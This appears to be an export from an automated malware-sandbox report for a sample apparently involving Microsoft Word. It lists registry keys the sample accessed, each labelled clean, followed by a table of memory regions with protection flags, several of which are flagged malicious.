HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@sendmail.dll,-21
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@zipfldr.dll,-10148
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@sendmail.dll,-4
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@C:\Windows\system32\FXSRESM.dll,-120
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ScT\OpenWithProgids
scriptletfile
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3017
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3018
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{06290BD2-48AA-11D2-8432-006008C3FBFC} {00000112-0000-0000-C000-000000000046} 0x5
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\WFS.exe
 clean
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus
FontCachePath
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\35928
35928
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
 clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\35928
35928
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
 clean
There are 340 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
unkown
page execute and read and write
 malicious
2510000
unkown
page read and write
 malicious
21F1000
unkown
page read and write
 malicious
402000
unkown
page execute and read and write
 malicious
402000
unkown
page execute and read and write
 malicious
402000
unkown
page execute and read and write
 malicious
402000
unkown
page execute and read and write
 malicious
2246000
unkown
page read and write
 malicious
242F000
unkown
page read and write
 malicious
342D000
unkown
page read and write
 malicious
30FA000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
2FC1000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
CCE000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
BB0000
unkown
page read and write
 clean
2270000
unkown
page read and write
 clean
F0000
unkown image
page read and write
 clean
761000
unkown
page read and write
 clean
5E0000
unkown
page read and write
 clean
7FF001C0000
unkown
page execute and read and write
 clean
90000
unkown
page read and write
 clean
5110000
unkown
page read and write
 clean
AAE000
stack
page read and write
 clean
50000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
39BC000
unkown
page read and write
 clean
2C4E000
stack
page read and write | page guard
 clean
7EFE0000
unkown image
page readonly
 clean
3114000
unkown
page read and write
 clean
28AA000
unkown
page read and write
 clean
10B000
heap default
page read and write
 clean
222C000
heap private
page read and write
 clean
57FF000
unkown
page read and write
 clean
7FF000F5000
unkown
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
6A1E000
stack
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
12C51000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
480000
unkown
page read and write
 clean
BB0000
unkown
page read and write
 clean
2C51000
unkown
page read and write
 clean
7FF00220000
unkown
page read and write
 clean
1E0000
heap default
page read and write
 clean
6D42000
unkown
page read and write
 clean
47DE000
stack
page read and write
 clean
30000
unkown image
page readonly
 clean
5EBE000
stack
page read and write
 clean
2E8B000
unkown
page read and write
 clean
20E1000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
2B8000
unkown
page read and write
 clean
35FC000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
306000
unkown
page read and write
 clean
3299000
unkown
page read and write
 clean
7FF00190000
unkown
page read and write
 clean
4CF000
stack
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
3A37000
unkown
page read and write
 clean
20E5000
heap private
page read and write
 clean
4FC0000
unkown image
page readonly
 clean
7FF001B0000
unkown
page execute and read and write
 clean
7EFB2000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
390000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
23C2000
unkown
page read and write
 clean
311A000
unkown
page read and write
 clean
780000
unkown
page read and write
 clean
4220000
stack
page read and write
 clean
1AC000
heap default
page read and write
 clean
A6D000
stack
page read and write
 clean
450000
unkown
page read and write
 clean
FE000
heap default
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
2FCE000
unkown
page read and write
 clean
4978000
heap private
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
760000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
A20000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
32BA000
unkown
page read and write
 clean
512D000
unkown
page read and write
 clean
3E6000
unkown
page read and write
 clean
35F5000
unkown
page read and write
 clean
211B000
heap private
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
38A2000
unkown
page read and write
 clean
1AF0000
unkown image
page readonly
 clean
3A99000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
39C9000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
7EFB0000
unkown image
page readonly
 clean
4664000
heap private
page read and write
 clean
3E5000
unkown
page read and write
 clean
30C4000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
1CAC0000
unkown
page read and write
 clean
3A0000
heap default
page read and write
 clean
7FF00122000
unkown
page execute and read and write
 clean
7EFC2000
unkown image
page readonly
 clean
4B0000
unkown image
page readonly
 clean
5BAE000
stack
page read and write
 clean
13032000
unkown
page read and write
 clean
31F7000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
367F000
unkown
page read and write
 clean
590000
unkown image
page read and write
 clean
3E5000
unkown
page read and write
 clean
465E000
stack
page read and write
 clean
4B30000
heap private
page read and write
 clean
142000
heap default
page read and write
 clean
7EFD0000
unkown image
page readonly
 clean
595D000
stack
page read and write
 clean
1E20000
unkown
page read and write
 clean
1B844000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
2E90000
unkown image
page readonly
 clean
3E0000
unkown
page read and write
 clean
510000
heap default
page read and write
 clean
661C000
heap private
page read and write
 clean
1B4E4000
unkown
page read and write
 clean
7EFB0000
unkown image
page readonly
 clean
7EFD0000
unkown image
page readonly
 clean
8D30000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
3549000
unkown
page read and write
 clean
2E9B000
unkown
page read and write
 clean
54FE000
stack
page read and write
 clean
B7E000
stack
page read and write
 clean
4797000
unkown
page read and write
 clean
57AC000
stack
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
750000
heap default
page read and write
 clean
456000
unkown
page read and write
 clean
78CB000
unkown
page read and write
 clean
614E000
stack
page read and write | page guard
 clean
6C0000
heap default
page read and write
 clean
BB0000
unkown
page read and write
 clean
310C000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
4210000
stack
page read and write
 clean
1CB0000
heap private
page execute and read and write
 clean
C52000
unkown image
page execute read
 clean
2238000
unkown
page read and write
 clean
2CAF000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7FF00012000
unkown
page execute and read and write
 clean
90000
unkown
page read and write
 clean
988000
unkown
page read and write
 clean
740000
unkown image
page readonly
 clean
7EFC2000
unkown image
page readonly
 clean
1C7000
heap private
page read and write
 clean
7FF000EA000
unkown
page execute and read and write
 clean
2A14000
unkown
page read and write
 clean
C52000
unkown image
page execute read
 clean
1CAC0000
unkown
page read and write
 clean
3A03000
unkown
page read and write
 clean
4E4000
heap default
page read and write
 clean
4FFD000
stack
page read and write
 clean
7FF00250000
unkown
page execute and read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
1B834000
unkown
page read and write
 clean
3A47000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
27A0000
unkown
page read and write
 clean
12EF1000
unkown
page read and write
 clean
5B5E000
stack
page read and write
 clean
450000
unkown
page read and write
 clean
3170000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
1C77E000
stack
page read and write
 clean
3A90000
unkown
page read and write
 clean
7FFFFFC2000
unkown image
page readonly
 clean
16F000
heap default
page read and write
 clean
760000
unkown
page read and write
 clean
770000
unkown
page read and write
 clean
20E4000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
75FE000
stack
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
7FFFFFC2000
unkown image
page readonly
 clean
7FF000E0000
unkown
page read and write
 clean
2880000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7FF000E5000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
7EFB2000
unkown image
page readonly
 clean
1CB0000
unkown image
page readonly
 clean
4210000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
750000
unkown
page execute and read and write
 clean
6CEF000
stack
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
458E000
stack
page read and write
 clean
7EFC0000
unkown image
page readonly
 clean
222A000
heap private
page read and write
 clean
3342000
unkown
page read and write
 clean
133000
unkown
page execute and read and write
 clean
583D000
stack
page read and write
 clean
3094000
unkown
page read and write
 clean
2D81000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
675E000
stack
page read and write
 clean
4BFE000
stack
page read and write
 clean
5D20000
unkown
page read and write
 clean
62BB000
stack
page read and write
 clean
7FFFFFB2000
unkown image
page readonly
 clean
3A9C000
unkown
page read and write
 clean
3B0000
unkown
page read and write
 clean
1B51D000
stack
page read and write
 clean
450000
unkown
page read and write
 clean
3157000
unkown
page read and write
 clean
7EFDF000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
7A1000
unkown
page read and write
 clean
2FBC000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
C40000
unkown
page read and write
 clean
7FFFFFC0000
unkown image
page readonly
 clean
1E80000
unkown image
page readonly
 clean
1C780000
unkown
page read and write
 clean
2820000
unkown
page read and write
 clean
20E0000
unkown
page read and write
 clean
307A000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
2F4E000
unkown
page read and write
 clean
78C1000
unkown
page read and write
 clean
45D0000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
3EB000
unkown
page read and write
 clean
64FE000
stack
page read and write
 clean
A20000
unkown
page read and write
 clean
162000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
503E000
stack
page read and write
 clean
45D0000
unkown
page read and write
 clean
910000
unkown
page read and write
 clean
4C0000
heap default
page read and write
 clean
2C44000
unkown
page read and write
 clean
7FF0002C000
unkown
page execute and read and write
 clean
2320000
unkown image
page readonly
 clean
2E7B000
unkown
page read and write
 clean
450000
unkown
page read and write
 clean
AF0000
unkown
page read and write
 clean
20B000
unkown
page read and write
 clean
1B8A2000
unkown
page read and write
 clean
3421000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
760000
unkown
page read and write
 clean
4A20000
unkown
page read and write
 clean
53FF000
stack
page read and write
 clean
39E4000
unkown
page read and write
 clean
1BC40000
heap private
page read and write
 clean
227000
unkown
page execute and read and write
 clean
2F2D000
unkown
page read and write
 clean
2F6D000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
4A4000
heap private
page read and write
 clean
7FF001E0000
unkown
page execute and read and write
 clean
241E000
stack
page read and write | page guard
 clean
450000
heap private
page read and write
 clean
4780000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
7A2000
unkown
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
7EFB0000
unkown image
page readonly
 clean
4480000
unkown
page read and write
 clean
60000
unkown image
page readonly
 clean
3E5000
unkown
page read and write
 clean
2FFD000
unkown
page read and write
 clean
7FF00230000
unkown
page execute and read and write
 clean
5D1F000
stack
page read and write
 clean
780000
unkown
page read and write
 clean
50000
unkown image
page readonly
 clean
5DE000
stack
page read and write
 clean
6981000
unkown
page read and write
 clean
190000
unkown
page read and write
 clean
490000
unkown image
page readonly
 clean
355F000
unkown
page read and write
 clean
10F000
heap default
page read and write
 clean
1BB0000
unkown
page read and write
 clean
3A53000
unkown
page read and write
 clean
27A0000
unkown
page read and write
 clean
2FF0000
unkown
page read and write
 clean
4A3D000
unkown
page read and write
 clean
CCE000
unkown image
page readonly
 clean
3A31000
unkown
page read and write
 clean
7FF00170000
unkown
page execute and read and write
 clean
1C780000
unkown
page read and write
 clean
180000
unkown image
page read and write
 clean
1A3000
unkown
page execute and read and write
 clean
450000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
7A0000
unkown
page read and write
 clean
3C0000
heap private
page read and write
 clean
4B50000
stack
page read and write
 clean
27A0000
unkown
page read and write
 clean
202B000
heap private
page read and write
 clean
2EE000
heap default
page read and write
 clean
6B1F000
stack
page read and write
 clean
2FCB000
unkown
page read and write
 clean
358E000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
455000
unkown
page read and write
 clean
10000
unkown image
page read and write
 clean
5E0000
unkown
page read and write
 clean
2B6000
heap default
page read and write
 clean
7EFC2000
unkown image
page readonly
 clean
7EFC0000
unkown image
page readonly
 clean
356A000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
318A000
unkown
page read and write
 clean
4B92000
heap private
page read and write
 clean
7FFFFFB0000
unkown image
page readonly
 clean
7FF00240000
unkown
page execute and read and write
 clean
3539000
unkown
page read and write
 clean
1BD000
unkown
page read and write
 clean
1C780000
unkown
page read and write
 clean
24BF000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
7FFFFFD0000
unkown image
page readonly
 clean
28A0000
unkown
page read and write
 clean
3E6000
unkown
page read and write
 clean
3E5000
unkown
page read and write
 clean
C50000
unkown image
page readonly
 clean
34C1000
unkown
page read and write
 clean
3E0000
unkown
page read and write
 clean
